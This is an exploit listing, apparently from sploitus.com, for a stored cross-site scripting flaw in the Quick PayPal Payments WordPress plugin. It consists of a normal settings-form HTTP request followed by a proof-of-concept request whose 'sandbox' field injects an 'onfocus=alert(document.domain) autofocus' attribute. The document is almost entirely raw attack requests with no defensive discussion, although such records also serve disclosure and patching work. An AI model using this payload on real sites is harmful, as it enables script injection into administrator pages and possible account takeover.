Share
## https://sploitus.com/exploit?id=WPEX-ID:0D247A3D-154E-4DA7-A147-C1C7E1B5E87E
Original request - with sandbox=checked
#####################
POST /wordpress/wp-admin/options-general.php?page=quick-paypal-payments&tab=setup HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:110.0) Gecko/20100101 Firefox/110.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/wordpress/wp-admin/options-general.php?page=quick-paypal-payments&tab=setup
Content-Type: application/x-www-form-urlencoded
Content-Length: 361
Origin: http://localhost
Connection: close
Cookie: XXX
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

email=test%40test.com&qpp_curr=USD&current=test&qpp_currtest=USD&deleteformtest=test&new_form=&new_curr=USD&alternative=test%2C&qpp_clone=Do+not+copy+settings&location=head&sandbox=checked&disable_error=checked&Submit=Update+Settings&_wpnonce=0ad2dfdf9f&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Foptions-general.php%3Fpage%3Dquick-paypal-payments%26tab%3Dsetup

#####################

POC request - with sandbox=checked%20onfocus%3dalert(document.domain)%20autofocus%3d%20

#####################

POST /wordpress/wp-admin/options-general.php?page=quick-paypal-payments HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:110.0) Gecko/20100101 Firefox/110.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/wordpress/wp-admin/options-general.php?page=quick-paypal-payments
Content-Type: application/x-www-form-urlencoded
Content-Length: 387
Origin: http://localhost
Connection: close
Cookie: XXX
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

email=test%40test.com&current=test%40test.com&qpp_curr=USD&new_form=test&new_curr=USD&alternative=&qpp_clone=Do+not+copy+settings&location=head&sandbox=checked%20onfocus%3dalert(document.domain)%20autofocus%3d%20&disable_error=checked&nostore=checked&Submit=Update+Settings&_wpnonce=0ad2dfdf9f&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Foptions-general.php%3Fpage%3Dquick-paypal-payments

#####################